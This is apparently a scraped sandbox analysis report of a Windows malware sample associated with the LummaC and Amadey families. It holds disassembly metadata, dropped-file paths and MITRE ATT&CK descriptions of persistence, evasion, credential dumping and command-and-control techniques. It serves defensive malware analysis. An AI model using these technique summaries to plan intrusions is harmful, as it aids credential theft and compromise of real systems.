Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: CriticalSection$EnterLeavefputs
String ID: ERROR:
API String ID: 4171338575-977468659
Opcode ID: 51b65b70fd9636ec3d92d8d392cf87c406234df2004214009f2d2c7c063ef683
Instruction ID: 4c0e5ce31e4d4091e530993d77bc55a1606709e639226b02e1a37a4f313884f6
Opcode Fuzzy Hash: 51b65b70fd9636ec3d92d8d392cf87c406234df2004214009f2d2c7c063ef683
Instruction Fuzzy Hash: BE11BC3231198595DB05DF25ED443E86361BBA9BA4F588232EF6E1B3A8CF388499C310

Function 001E211C Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 001E2137
free.MSVCRT ref: 001E21BB

Part of subcall function 001D6618: FormatMessageW.KERNEL32 ref: 001D6676
Part of subcall function 001D6618: LocalFree.KERNEL32 ref: 001D6698

Part of subcall function 001D362C: memmove.MSVCRT ref: 001D3659

free.MSVCRT ref: 001E2182

Strings

: , xrefs: 001E2151, 001E2187

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free$ErrorFormatFreeLastLocalMessagememmove
String ID: :
API String ID: 1743135865-3653984579
Opcode ID: 0bd9cf6b41112b825cc91f2e3a5d39e6d602e68f921f465e2c8b822415a3c1c2
Instruction ID: 48b072640f83ad1d4b431636608ff52b3513c60794718d3ffffe979fc7e0c4df
Opcode Fuzzy Hash: 0bd9cf6b41112b825cc91f2e3a5d39e6d602e68f921f465e2c8b822415a3c1c2
Instruction Fuzzy Hash: B101696730090091CA21EB25E88525E6731EBE5BF4F585322BE6E477B9DF38CB86C750

Function 001FA034 Relevance: 5.1, APIs: 4, Instructions: 81COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 001FA070
free.MSVCRT ref: 001FA078
free.MSVCRT ref: 001FA0E2
memmove.MSVCRT ref: 001FA118

Memory Dump Source

Source File: 0000000B.00000002.2956567698.00000000001D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 001D0000, based on PE: true

Associated: 0000000B.00000002.2956541972.00000000001D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956609260.000000000021F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956633217.000000000023C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2956652294.000000000023F000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1d0000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-0
Opcode ID: 67c0837a8ac08b8e7b81d59f219567057fac08a4c31a6893a672a0fe60d58eed
Instruction ID: ae78281c8a26ec7e0b11a5b75497a4f1dee05c1e775be920f05532815b7bd8f3
Opcode Fuzzy Hash: 67c0837a8ac08b8e7b81d59f219567057fac08a4c31a6893a672a0fe60d58eed
Instruction Fuzzy Hash: 7B2104A3201B8889DB15AF26EC557396364BF65B94F9DC125EF6D0B380DF7C8882C312

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Bitcoin Miner

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[2].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[2].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe

Windows Analysis Report
file.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre